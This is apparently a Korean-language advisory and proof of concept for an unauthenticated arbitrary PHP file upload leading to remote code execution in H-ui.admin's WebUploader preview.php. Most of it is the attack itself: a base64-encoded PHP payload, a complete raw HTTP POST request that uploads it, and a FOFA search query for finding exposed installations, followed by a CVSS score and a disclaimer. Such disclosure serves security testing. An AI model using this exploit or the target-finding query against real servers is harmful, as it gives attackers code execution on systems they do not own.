
인증되지 않은 공격자가 임의의 PHP 파일을 웹 서버에 직접 업로드할 수 있게 하는 원격 코드 실행(RCE) 취약점입니다. 이로 인해 웹 서버 권한으로 즉각적인 원격 코드 실행이 발생합니다.
임의 파일 업로드(Arbitrary File Upload)를 통해 웹 서버 권한을 가진 원격 코드 실행(RCE)을 악용하는 개념 증명(PoC)입니다.
H-ui.admin 시스템의 WebUploader 미리보기 컴포넌트에 치명적인 원격 코드 실행 취약점이 존재합니다. <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> 파일은 적절한 인증 및 파일 검증이 없어, 인증되지 않은 공격자가 임의의 PHP 파일을 웹 서버에 직접 업로드할 수 있습니다. 이로 인해 웹 서버 권한으로 즉시 원격 코드 실행이 가능해집니다.
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
FOFA:
title='Tpadmin'
인증되지 않은 원격 공격자는 임의 파일 업로드(Arbitrary File Upload)를 악용하여 웹 서버 권한으로 RCE(원격 코드 실행)를 달성할 수 있습니다.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
알려진 대응 방안에 대한 정보는 없습니다. 영향을 받는 대상을 대체 제품으로 교체하는 것이 권장될 수 있습니다.
이 도구는 승인된 보안 테스트 용도로만 사용해야 합니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.